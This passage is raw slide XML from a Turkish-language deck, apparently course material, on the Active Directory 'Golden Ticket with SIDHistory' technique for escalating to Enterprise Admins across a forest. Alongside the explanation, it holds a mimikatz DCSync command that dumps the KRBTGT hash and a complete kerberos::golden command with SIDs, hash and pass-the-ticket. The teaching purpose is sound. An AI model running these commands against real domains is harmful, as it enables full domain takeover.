              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>istenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>servis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>TGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bileti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>oluşturulabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Golden Ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>adlandırılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Birden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>fazla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yapısı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>altyapılarında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eğer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obje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domainden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>diğerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>taşınırsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>domaindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkilerinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>korunması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>domaindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>SID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>değeri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>yeni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>domaindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>SIDHistory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tutulmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sayede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hesaba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dair</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilgiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kaybolmamış</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>olmakta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>domaindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkileriyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hareket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>edebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Bu tip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obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bileti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>oluşturulurken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> SID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değerinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sıra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>SIDHistory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değerleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eklenir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sayede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>içerisindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değerler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>domaine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>aktarılabilmektedir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54858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267CD-A52F-63BE-31B6-5BF9C4E80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TTP 0x18 – Golden Ticket w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SIDHistory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0661D-FD09-D25C-7440-07108A3F44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sz="2400"/>
              <a:t>Bir Forest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>içerisindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>herhangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>domainin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> KRBTGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>hesabının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>özeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>SIDHistory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>özelliği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>kullanılarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>domaine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>yetkileriyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>erişilebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>işlem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> Golden Ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>oluşturulurken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>SIDHistory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>alanına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>domainde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>yetkili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>olan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>Forest’ta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>yetkili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>olan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> (Enterprise Admins) SID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>değerinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>girilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>gerçekleştirilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A gold ticket with black text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4208D1E4-6271-9794-428B-3C546962A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900204"/>
            <a:ext cx="5181600" cy="22021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10250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60683FF-3CB5-A59C-AEB4-860A77CAE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TTP 0x18 – Golden Ticket w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SIDHistory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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CCDC74E-B6F3-735D-C55B-171051B9A0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accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCSync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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> KRBTGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hesabının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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parola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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>özeti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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elde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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ediliyor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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.\mimikatz.exe "privilege::debug" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lsadump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domain:INTERNAL.LOCAL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /user:root123@INTERNAL.LOCAL" "exit"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="A blue screen with white text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0179755-64BF-1B58-2D17-573B5C1F00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774156" y="2855122"/>
            <a:ext cx="6643687" cy="33218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943419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60F9-866C-3851-EAB4-6E10687B4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sz="3600" dirty="0"/>
              <a:t>TTP 0x18 – Golden Ticket w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>SIDHistory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> - Exploitation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AF611-8935-79B3-3E94-B3A892B093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368425"/>
            <a:ext cx="10515599" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Enterprise Admin Sidi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>kullanılarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Golden Ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>üretiliyor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>.\mimikatz.exe "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>::golden /user:root123 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>domain:INTERNAL.LOCAL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> /sid:S-1-5-21-1234564456-3701834485-3839312249 /krbtgt:3b4d99def89329ace111fb148acb629f /id:500 /sids:S-1-5-21-246663577-1172385535-561243890-519 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>" "exit"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7CA9CD9-454D-E75B-9C94-05B7B24C726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097337399"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="321469" y="2577307"/>
          <a:ext cx="1154906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1215">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1900531459"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4794763">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
